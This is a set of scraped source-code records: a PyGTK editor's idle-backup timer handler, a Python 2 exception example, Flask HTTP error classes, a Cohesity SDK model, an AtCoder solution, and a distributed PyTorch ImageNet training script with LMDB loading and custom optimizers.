(pedconfig.conf.config_reg + "/cnt",\
cnt)
# Exit here
gtk.main_quit()
#print "OnExit called \"" + arg.get_title() + "\""
# ------------------------------------------------------------------------
def handler(signum, frame):
try:
#print 'Signal handler called with signal', signum
global notebook
if pedconfig.conf.idle:
pedconfig.conf.idle -= 1
if pedconfig.conf.idle == 0:
vcurr = notebook.get_nth_page(notebook.get_current_page())
# Rescue to save:
if vcurr:
if vcurr.area.changed:
hhh = hash_name(vcurr.area.fname) + ".sav"
xfile = pedconfig.conf.config_dir + "/" + hhh
writefile(xfile, vcurr.area.text)
#strx = "Backed up file '{0:s}'".format(xfile)
# This will raise exception
#self.update_statusbar(strx)
if pedconfig.conf.syncidle:
pedconfig.conf.syncidle -= 1
if pedconfig.conf.syncidle == 0:
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
if vcurr.area.changed:
vcurr.area2.text = vcurr.area.text
vcurr.area2.invalidate()
if pedconfig.conf.pedwin.statuscount:
pedconfig.conf.pedwin.statuscount -= 1
if pedconfig.conf.pedwin.statuscount == 0:
pedconfig.conf.pedwin.update_statusbar("Idle.");
pedconfig.conf.pedwin.statuscount = 0
except:
print "Exception in timer handler"
signal.alarm(1)
| [
"[email protected]"
] | |
3df0a1ceeeace730a593525fe10af770673e4a9f | 57522f0bdc09c57e32f8a8e34e4c5da64aedbc86 | /ERROR_UNUSUAL/ERROE_FROM_PYTHON.py | 6ce889b0debfc93ea890cfb822d651f105813efb | [] | no_license | Alexanderklau/Start_again-python- | 97b30345e2ef13d4552d7efd82498e7e615c262e | 7ffbc2a6d53e1cff1c57258169c66bbab87210bc | refs/heads/master | 2021-01-19T03:27:53.865013 | 2017-05-01T13:47:31 | 2017-05-01T13:47:31 | 87,314,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | # -*-coding:utf-8 -*-
__author__ = 'Yemilice_lau'
# NameError
# ZeroDivisionError
# SyntaxError
# KeyError
# IOError
# AttributeError
# ImportError
# Detecting exceptions
try:
    try_site()  # detect exceptions raised here (try_site is a placeholder name)
except IOError, e:
    print 'Error is:', e
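# Minimal runnable demonstrations for two of the exception types listed
# above (Python 2 syntax, matching this file):
try:
    1 / 0
except ZeroDivisionError, e:
    print 'ZeroDivisionError is:', e
try:
    {}['missing']
except KeyError, e:
    print 'KeyError is:', e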
# if __name__ == '__main__': | [
"[email protected]"
] | |
e54187180a4b3c1c7bb03c5ea33d3a7e525b28f0 | 7327ec847993aee7d19f647499a99aaa335894f0 | /ExceptionsClasses.py | 5f39dbc10b34c380ebfc8c145d7c28bb7d60478b | [] | no_license | chetat/chingu-journal | ae56749fd62076ab31398afbcd78acef22519033 | 1a6ef77075e866d08613a884d474303e96cb7aa8 | refs/heads/master | 2023-02-05T08:13:38.987587 | 2019-08-29T22:33:36 | 2019-08-29T22:33:36 | 200,136,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,728 | py | from flask import jsonify
class BadRequest(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class ResourceExist(Exception):
status_code = 409
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class UnAuthorized(Exception):
status_code = 401
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class NotAcceptable(Exception):
status_code = 406
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class UnprocessableEntity(Exception):
status_code = 422
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class NotFound(Exception):
status_code = 404
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class InternalServerError(Exception):
status_code = 500
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class Forbiden(Exception):
status_code = 403
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
class MethodNotAllowed(Exception):
status_code = 405
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
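# Usage sketch (not part of the original module): wiring these classes into a
# Flask app so that raising e.g. NotFound('entry not found') from any view
# returns a JSON body built by to_dict() with the matching status code.
# `app` is assumed to be a Flask instance defined elsewhere.
def register_error_handlers(app):
    def handle_api_exception(error):
        return jsonify(error.to_dict()), error.status_code
    for exc in (BadRequest, ResourceExist, UnAuthorized, NotAcceptable,
                UnprocessableEntity, NotFound, InternalServerError,
                Forbiden, MethodNotAllowed):
        app.errorhandler(exc)(handle_api_exception)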
| [
"[email protected]"
] | |
4d080f5004c60a7a65725ed543f71140381ea82a | 665455c521cc7cf76c5436337ed545de90976af4 | /cohesity_management_sdk/models/protection_runs_stats.py | 07e3d61720f3193a37daf1c0aaeaedb77522bcca | [
"Apache-2.0"
] | permissive | hsantoyo2/management-sdk-python | d226273bc8eedcf9220ea4999a6f0b9a1a30d99c | 0093194d125fc6746f55b8499da1270c64f473fc | refs/heads/master | 2023-03-01T06:09:39.644085 | 2021-01-15T08:23:16 | 2021-01-15T08:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,044 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class ProtectionRunsStats(object):
"""Implementation of the 'ProtectionRunsStats' model.
Specifies the Protection Runs statistics response.
Attributes:
num_archival_runs (long|int): Specifies the count of archival Runs.
num_backup_runs (long|int): Specifies the count of backup Runs.
num_replication_runs (long|int): Specifies the count of replication
Runs.
"""
# Create a mapping from Model property names to API property names
_names = {
"num_archival_runs":'numArchivalRuns',
"num_backup_runs":'numBackupRuns',
"num_replication_runs":'numReplicationRuns'
}
def __init__(self,
num_archival_runs=None,
num_backup_runs=None,
num_replication_runs=None):
"""Constructor for the ProtectionRunsStats class"""
# Initialize members of the class
self.num_archival_runs = num_archival_runs
self.num_backup_runs = num_backup_runs
self.num_replication_runs = num_replication_runs
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
num_archival_runs = dictionary.get('numArchivalRuns')
num_backup_runs = dictionary.get('numBackupRuns')
num_replication_runs = dictionary.get('numReplicationRuns')
# Return an object of this model
return cls(num_archival_runs,
num_backup_runs,
num_replication_runs)
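# Usage sketch (not part of the generated SDK): round-trip from an API-style
# dictionary; keys follow the `_names` mapping above.
if __name__ == '__main__':
    stats = ProtectionRunsStats.from_dictionary(
        {'numArchivalRuns': 2, 'numBackupRuns': 10, 'numReplicationRuns': 3})
    print(stats.num_backup_runs)  # -> 10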
| [
"[email protected]"
] | |
0c27d20fdc87eca7ffd5e3dd23dc7183700d8b76 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /atcoder/abc152_a.py | 9ff50dea04ec97c69fb7147455ba99f12c361aed | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | # https://atcoder.jp/contests/abc152/tasks/abc152_a
N, M = map(int, input().split())
# Accepted only if all N test cases passed (M == N)
if N == M:
print('Yes')
else:
print('No')
| [
"[email protected]"
] | |
c1cb40301e773f59af6f3d697501c53cd539d985 | 95884a6b32f6831e68c95d7785bc968a56877121 | /cifar_imagenet/imagenet_lmdb_fixed_drop.py | b0cceb1b5a01f6c87a137f3495ed598b0687dd30 | [
"MIT",
"Apache-2.0"
] | permissive | minhtannguyen/RAdam | d89c4c6ce1ce0dd95b0be3aa2c20e70ea62da8b0 | 44f403288df375bae0785cc82dd8c888eaaaa441 | refs/heads/master | 2020-08-09T07:53:50.601789 | 2020-02-17T06:17:05 | 2020-02-17T06:17:05 | 214,041,479 | 0 | 0 | Apache-2.0 | 2019-10-09T23:11:14 | 2019-10-09T23:11:14 | null | UTF-8 | Python | false | false | 25,843 | py | '''
Training script for ImageNet
Copyright (c) Wei YANG, 2017
'''
from __future__ import print_function
import argparse
import os
import shutil
import time
import random
import fcntl
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data as data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import models.imagenet as customized_models
from utils import Bar, Logger, AverageMeter, mkdir_p, savefig, LoggerDistributed
from utils.radam import RAdam, AdamW
from utils.lsradam import LSRAdam, LSAdamW
from optimizers.sgd_adaptive3 import *
from optimizers.SRAdamW import *
from optimizers.SRRAdam import *
from tensorboardX import SummaryWriter
# for loading LMDB
from apex.parallel import DistributedDataParallel as DDP
from apex.fp16_utils import to_python_float
import io
from PIL import Image
try:
import lmdb
except:
pass
import torch.distributed as dist
# Models
default_model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
customized_models_names = sorted(name for name in customized_models.__dict__
if name.islower() and not name.startswith("__")
and callable(customized_models.__dict__[name]))
for name in customized_models.__dict__:
if name.islower() and not name.startswith("__") and callable(customized_models.__dict__[name]):
models.__dict__[name] = customized_models.__dict__[name]
model_names = default_model_names + customized_models_names
# Parse arguments
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
# Datasets
parser.add_argument('-d', '--data', default='path to dataset', type=str)
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
# Optimization options
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--train-batch', default=256, type=int, metavar='N',
help='train batchsize (default: 256)')
parser.add_argument('--test-batch', default=200, type=int, metavar='N',
help='test batchsize (default: 200)')
parser.add_argument('--optimizer', default='sgd', type=str, help='optimizer sgd|adam|radam')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--beta1', default=0.9, type=float,
help='beta1 for adam')
parser.add_argument('--beta2', default=0.999, type=float,
help='beta2 for adam')
parser.add_argument('--drop', '--dropout', default=0, type=float,
metavar='Dropout', help='Dropout ratio')
parser.add_argument('--schedule', type=int, nargs='+', default=[150, 225],
help='Decrease learning rate at these epochs.')
parser.add_argument('--restart-schedule', type=int, nargs='+', default=[80, 200, 500, 1000],
help='Restart at after these amounts of epochs.')
parser.add_argument('--gamma', type=float, default=0.1, help='LR is multiplied by gamma on schedule.')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
# Checkpoints
parser.add_argument('-c', '--checkpoint', default='checkpoint', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
# Architecture
parser.add_argument('--arch', '-a', metavar='ARCH', default='resnet18',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: resnet18)')
parser.add_argument('--depth', type=int, default=29, help='Model depth.')
parser.add_argument('--cardinality', type=int, default=32, help='ResNet cardinality (group).')
parser.add_argument('--base-width', type=int, default=4, help='ResNet base width.')
parser.add_argument('--widen-factor', type=int, default=4, help='Widen factor. 4 -> 64, 8 -> 128, ...')
# Miscs
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
#Device options
parser.add_argument('--gpu-id', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--model_name', default='sgd')
# DALI
parser.add_argument('--dali_cpu', action='store_true',
help='Runs CPU based version of DALI pipeline.')
parser.add_argument('--local_rank', type=int, default=0,
help='rank of process')
# LSAdam
parser.add_argument('--sigma', default=0.1, type=float, help='sigma in LSAdam')
args = parser.parse_args()
# Set up DDP.
args.distributed = True
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
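# env:// init reads MASTER_ADDR/MASTER_PORT (and RANK/WORLD_SIZE) from
# environment variables set by the process launcher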
args.world_size = torch.distributed.get_world_size()
state = {k: v for k, v in args._get_kwargs()}
# logger
if args.local_rank == 0:
if not os.path.exists(args.checkpoint): os.makedirs(args.checkpoint)
writer = SummaryWriter(os.path.join(args.checkpoint, 'tensorboard')) # write to tensorboard
# Use CUDA
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
use_cuda = torch.cuda.is_available()
# Random seed
if args.manualSeed is None:
args.manualSeed = random.randint(1, 10000)
random.seed(args.manualSeed)
cudnn.benchmark = True
torch.manual_seed(args.manualSeed)
cudnn.enabled = True
if use_cuda:
torch.cuda.manual_seed_all(args.manualSeed)
# Subroutines for lmdb_loader
def lmdb_loader(path, lmdb_data):
# In-memory binary streams
with lmdb_data.begin(write=False, buffers=True) as txn:
bytedata = txn.get(path.encode('ascii'))
img = Image.open(io.BytesIO(bytedata))
return img.convert('RGB')
def imagenet_lmdb_dataset(
root, transform=None, target_transform=None,
loader=lmdb_loader):
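    # Build (or reuse) an LMDB cache of the ImageFolder: the scanned file list
    # is pickled to *_faster_imagefolder.lmdb.pt and the raw image bytes go
    # into *_faster_imagefolder.lmdb, so later runs skip the slow folder scan.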
if root.endswith('/'):
root = root[:-1]
pt_path = os.path.join(
root + '_faster_imagefolder.lmdb.pt')
lmdb_path = os.path.join(
root + '_faster_imagefolder.lmdb')
if os.path.isfile(pt_path) and os.path.isdir(lmdb_path):
print('Loading pt {} and lmdb {}'.format(pt_path, lmdb_path))
data_set = torch.load(pt_path)
else:
data_set = datasets.ImageFolder(
root, None, None, None)
torch.save(data_set, pt_path, pickle_protocol=4)
print('Saving pt to {}'.format(pt_path))
print('Building lmdb to {}'.format(lmdb_path))
        env = lmdb.open(lmdb_path, map_size=int(1e12))  # py-lmdb expects an int map size
with env.begin(write=True) as txn:
for path, class_index in data_set.imgs:
with open(path, 'rb') as f:
data = f.read()
txn.put(path.encode('ascii'), data)
data_set.lmdb_data = lmdb.open(
lmdb_path, readonly=True, max_readers=1, lock=False, readahead=False,
meminit=False)
# reset transform and target_transform
data_set.samples = data_set.imgs
data_set.transform = transform
data_set.target_transform = target_transform
data_set.loader = lambda path: loader(path, data_set.lmdb_data)
return data_set
best_top1 = 0 # best test top1 accuracy
best_top5 = 0 # best test top5 accuracy
batch_time_global = AverageMeter()
data_time_global = AverageMeter()
def main():
global best_top1, best_top5
start_epoch = args.start_epoch # start from epoch 0 or last checkpoint epoch
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
# Data loading code
traindir = os.path.join(args.data, 'train')
validdir = os.path.join(args.data, 'val')
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
train_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
val_transform = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])
train_data = imagenet_lmdb_dataset(traindir, transform=train_transform)
valid_data = imagenet_lmdb_dataset(validdir, transform=val_transform)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
train_loader = torch.utils.data.DataLoader(
train_data, batch_size=args.train_batch,
shuffle=(train_sampler is None),
pin_memory=True, num_workers=8, sampler=train_sampler)
val_loader = torch.utils.data.DataLoader(
valid_data, batch_size=args.test_batch, shuffle=False,
pin_memory=True, num_workers=8)
# create model
if args.pretrained:
print("=> using pre-trained model '{}'".format(args.arch))
model = models.__dict__[args.arch](pretrained=True)
elif args.arch.startswith('resnext'):
model = models.__dict__[args.arch](
baseWidth=args.base_width,
cardinality=args.cardinality,
)
else:
print("=> creating model '{}'".format(args.arch))
model = models.__dict__[args.arch]()
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = DDP(model.features)
model.cuda()
else:
model = model.cuda()
model = DDP(model, delay_allreduce=True)
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
if args.optimizer.lower() == 'sgd':
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
elif args.optimizer.lower() == 'adamw':
optimizer = AdamW(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), weight_decay=args.weight_decay, warmup = 0)
elif args.optimizer.lower() == 'radam':
optimizer = RAdam(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), weight_decay=args.weight_decay)
elif args.optimizer.lower() == 'lsadam':
optimizer = LSAdamW(model.parameters(), lr=args.lr*((1.+4.*args.sigma)**(0.25)),
betas=(args.beta1, args.beta2),
weight_decay=args.weight_decay,
sigma=args.sigma)
elif args.optimizer.lower() == 'lsradam':
sigma = 0.1
optimizer = LSRAdam(model.parameters(), lr=args.lr*((1.+4.*args.sigma)**(0.25)),
betas=(args.beta1, args.beta2),
weight_decay=args.weight_decay,
sigma=args.sigma)
elif args.optimizer.lower() == 'srsgd':
iter_count = 1
optimizer = SGD_Adaptive(model.parameters(), lr=args.lr, weight_decay=args.weight_decay, iter_count=iter_count, restarting_iter=args.restart_schedule[0])
elif args.optimizer.lower() == 'sradam':
iter_count = 1
optimizer = SRNAdam(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), iter_count=iter_count, weight_decay=args.weight_decay, restarting_iter=args.restart_schedule[0])
elif args.optimizer.lower() == 'sradamw':
iter_count = 1
optimizer = SRAdamW(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), iter_count=iter_count, weight_decay=args.weight_decay, warmup = 0, restarting_iter=args.restart_schedule[0])
elif args.optimizer.lower() == 'srradam':
#NOTE: need to double-check this
iter_count = 1
optimizer = SRRAdam(model.parameters(), lr=args.lr, betas=(args.beta1, args.beta2), iter_count=iter_count, weight_decay=args.weight_decay, warmup = 0, restarting_iter=args.restart_schedule[0])
schedule_index = 1
# Resume
title = 'ImageNet-' + args.arch
if args.resume:
# Load checkpoint.
print('==> Resuming from checkpoint..')
        assert os.path.isfile(args.resume), 'Error: no checkpoint file found!'
# args.checkpoint = os.path.dirname(args.resume)
# checkpoint = torch.load(args.resume, map_location = lambda storage, loc: storage.cuda(args.local_rank))
checkpoint = torch.load(args.resume, map_location = torch.device('cpu'))
best_top1 = checkpoint['best_top1']
best_top5 = checkpoint['best_top5']
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
        if args.optimizer.lower() in ('srsgd', 'sradam', 'sradamw', 'srradam'):
iter_count = optimizer.param_groups[0]['iter_count']
schedule_index = checkpoint['schedule_index']
state['lr'] = optimizer.param_groups[0]['lr']
if args.checkpoint == args.resume:
logger = LoggerDistributed(os.path.join(args.checkpoint, 'log.txt'), rank=args.local_rank, title=title, resume=True)
else:
logger = LoggerDistributed(os.path.join(args.checkpoint, 'log.txt'), rank=args.local_rank, title=title)
if args.local_rank == 0:
logger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Top1', 'Valid Top1', 'Train Top5', 'Valid Top5'])
else:
logger = LoggerDistributed(os.path.join(args.checkpoint, 'log.txt'), rank=args.local_rank, title=title)
if args.local_rank == 0:
logger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Top1', 'Valid Top1', 'Train Top5', 'Valid Top5'])
if args.local_rank == 0:
logger.file.write(' Total params: %.2fM' % (sum(p.numel() for p in model.parameters())/1000000.0))
if args.evaluate:
if args.local_rank == 0:
logger.file.write('\nEvaluation only')
test_loss, test_top1, test_top5 = test(val_loader, model, criterion, start_epoch, use_cuda, logger)
if args.local_rank == 0:
logger.file.write(' Test Loss: %.8f, Test Top1: %.2f, Test Top5: %.2f' % (test_loss, test_top1, test_top5))
return
# Train and val
for epoch in range(start_epoch, args.epochs):
# Shuffle the sampler.
train_loader.sampler.set_epoch(epoch + args.manualSeed)
if args.optimizer.lower() == 'srsgd':
if epoch in args.schedule:
optimizer = SGD_Adaptive(model.parameters(), lr=args.lr * (args.gamma**schedule_index), weight_decay=args.weight_decay, iter_count=iter_count, restarting_iter=args.restart_schedule[schedule_index])
schedule_index += 1
if epoch == 70:
current_restarting_iter = args.restart_schedule[schedule_index]
optimizer = SGD_Adaptive(model.parameters(), lr=args.lr * (args.gamma**schedule_index), weight_decay=args.weight_decay, iter_count=iter_count, restarting_iter=current_restarting_iter)
else:
adjust_learning_rate(optimizer, epoch)
if args.local_rank == 0:
logger.file.write('\nEpoch: [%d | %d] LR: %f' % (epoch + 1, args.epochs, state['lr']))
        if args.optimizer.lower() in ('srsgd', 'sradam', 'sradamw', 'srradam'):
train_loss, train_top1, train_top5, iter_count = train(train_loader, model, criterion, optimizer, epoch, use_cuda, logger)
else:
train_loss, train_top1, train_top5 = train(train_loader, model, criterion, optimizer, epoch, use_cuda, logger)
test_loss, test_top1, test_top5 = test(val_loader, model, criterion, epoch, use_cuda, logger)
# append logger file
if args.local_rank == 0:
logger.append([state['lr'], train_loss, test_loss, train_top1, test_top1, train_top5, test_top5])
writer.add_scalars('train_loss', {args.model_name: train_loss}, epoch)
writer.add_scalars('test_loss', {args.model_name: test_loss}, epoch)
writer.add_scalars('train_top1', {args.model_name: train_top1}, epoch)
writer.add_scalars('test_top1', {args.model_name: test_top1}, epoch)
writer.add_scalars('train_top5', {args.model_name: train_top5}, epoch)
writer.add_scalars('test_top5', {args.model_name: test_top5}, epoch)
# save model
is_best = test_top1 > best_top1
best_top1 = max(test_top1, best_top1)
best_top5 = max(test_top5, best_top5)
if args.local_rank == 0:
save_checkpoint({
'epoch': epoch + 1,
'schedule_index': schedule_index,
'state_dict': model.state_dict(),
'top1': test_top1,
'top5': test_top5,
'best_top1': best_top1,
'best_top5': best_top5,
'optimizer' : optimizer.state_dict(),
}, is_best, epoch, checkpoint=args.checkpoint)
if epoch == args.schedule[-1]:
logger.file.write('Best top1: %f at epoch %i'%(best_top1, epoch))
logger.file.write('Best top5: %f at epoch %i'%(best_top5, epoch))
print('Best top1: %f at epoch %i'%(best_top1, epoch))
print('Best top5: %f at epoch %i'%(best_top5, epoch))
with open("./all_results_imagenet.txt", "a") as f:
fcntl.flock(f, fcntl.LOCK_EX)
f.write("%s\n"%args.checkpoint)
f.write("best_top1 %f, best_top5 %f at epoch %i\n\n"%(best_top1,best_top5,epoch))
fcntl.flock(f, fcntl.LOCK_UN)
if args.local_rank == 0:
logger.file.write('Best top1: %f'%best_top1)
logger.file.write('Best top5: %f'%best_top5)
logger.close()
logger.plot()
savefig(os.path.join(args.checkpoint, 'log.eps'))
print('Best top1: %f'%best_top1)
print('Best top5: %f'%best_top5)
with open("./all_results_imagenet.txt", "a") as f:
fcntl.flock(f, fcntl.LOCK_EX)
f.write("%s\n"%args.checkpoint)
f.write("best_top1 %f, best_top5 %f\n\n"%(best_top1,best_top5))
fcntl.flock(f, fcntl.LOCK_UN)
def train(train_loader, model, criterion, optimizer, epoch, use_cuda, logger):
global batch_time_global, data_time_global
# switch to train mode
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
end = time.time()
train_loader_len = len(train_loader)
# print('Length of train loader = %i\n'%train_loader_len)
bar = Bar('Processing', max=train_loader_len)
for batch_idx, (inputs, targets) in enumerate(train_loader):
# measure data loading time
data_time_lap = time.time() - end
data_time.update(data_time_lap)
if epoch > 0:
data_time_global.update(data_time_lap)
n = inputs.size(0)
if use_cuda:
inputs = inputs.cuda()
targets = targets.cuda()
# print('input size = %i, device %s\n'%(inputs.size(0), inputs.device))
# compute output
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, targets)
# Backward and step.
loss.backward()
optimizer.step()
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs, targets, topk=(1, 5))
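        # average loss/accuracy across workers so every rank records the same metrics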
reduced_loss = reduce_tensor(loss.data, args.world_size)
prec1 = reduce_tensor(prec1, args.world_size)
prec5 = reduce_tensor(prec5, args.world_size)
losses.update(to_python_float(reduced_loss), n)
top1.update(to_python_float(prec1), n)
top5.update(to_python_float(prec5), n)
# for restarting
        if args.optimizer.lower() in ('srsgd', 'sradam', 'sradamw', 'srradam'):
iter_count, iter_total = optimizer.update_iter()
# measure elapsed time
batch_time_lap = time.time() - end
batch_time.update(batch_time_lap)
if epoch > 0:
batch_time_global.update(batch_time_lap)
end = time.time()
# plot progress
bar.suffix = '(Epoch {epoch}, {batch}/{size}) Data: {data:.3f}s/{data_global:.3f}s | Batch: {bt:.3f}s/{bt_global:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
epoch=epoch,
batch=batch_idx + 1,
size=train_loader_len,
data=data_time.val,
data_global=data_time_global.avg,
bt=batch_time.val,
bt_global=batch_time_global.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
bar.next()
if args.local_rank == 0:
logger.file.write(bar.suffix)
bar.finish()
    if args.optimizer.lower() in ('srsgd', 'sradam', 'sradamw', 'srradam'):
return (losses.avg, top1.avg, top5.avg, iter_count)
else:
return (losses.avg, top1.avg, top5.avg)
def test(val_loader, model, criterion, epoch, use_cuda, logger):
global best_top1, best_top5
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
val_loader_len = len(val_loader)
bar = Bar('Processing', max=val_loader_len)
for batch_idx, (inputs, targets) in enumerate(val_loader):
# measure data loading time
data_time.update(time.time() - end)
n=inputs.size(0)
if use_cuda:
inputs = inputs.cuda()
targets = targets.cuda()
# compute output
outputs = model(inputs)
loss = criterion(outputs, targets)
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs, targets, topk=(1, 5))
losses.update(loss.item(), n)
top1.update(prec1.item(), n)
top5.update(prec5.item(), n)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# plot progress
bar.suffix = '(Epoch {epoch}, {batch}/{size}) Data: {data:.3f}s | Batch: {bt:.3f}s | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f}'.format(
epoch=epoch,
batch=batch_idx + 1,
size=val_loader_len,
data=data_time.avg,
bt=batch_time.avg,
total=bar.elapsed_td,
eta=bar.eta_td,
loss=losses.avg,
top1=top1.avg,
top5=top5.avg,
)
if args.local_rank == 0:
logger.file.write(bar.suffix)
bar.next()
bar.finish()
return (losses.avg, top1.avg, top5.avg)
def save_checkpoint(state, is_best, epoch, checkpoint='checkpoint', filename='checkpoint.pth.tar'):
filepath = os.path.join(checkpoint, filename)
torch.save(state, filepath)
next_epoch = epoch + 1
next_two_epoch = epoch + 2
if is_best:
shutil.copyfile(filepath, os.path.join(checkpoint, 'model_best.pth.tar'))
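    # also snapshot the checkpoint when the next (or next-but-one) epoch is an
    # LR-schedule milestone, preserving the pre-decay weights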
if next_epoch in args.schedule:
shutil.copyfile(filepath, os.path.join(checkpoint, 'model_epoch_%i.pth.tar'%epoch))
if next_two_epoch in args.schedule:
shutil.copyfile(filepath, os.path.join(checkpoint, 'model_epoch_%i.pth.tar'%epoch))
def adjust_learning_rate(optimizer, epoch):
global state
if epoch in args.schedule:
state['lr'] *= args.gamma
for param_group in optimizer.param_groups:
param_group['lr'] = state['lr']
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def reduce_tensor(tensor, world_size):
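    # all-reduce (sum) across ranks, then divide: the mean of `tensor` over all workers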
rt = tensor.clone()
dist.all_reduce(rt, op=dist.ReduceOp.SUM)
rt /= world_size
return rt
if __name__ == '__main__':
main()
# writer.close()
| [
"[email protected]"
] | |
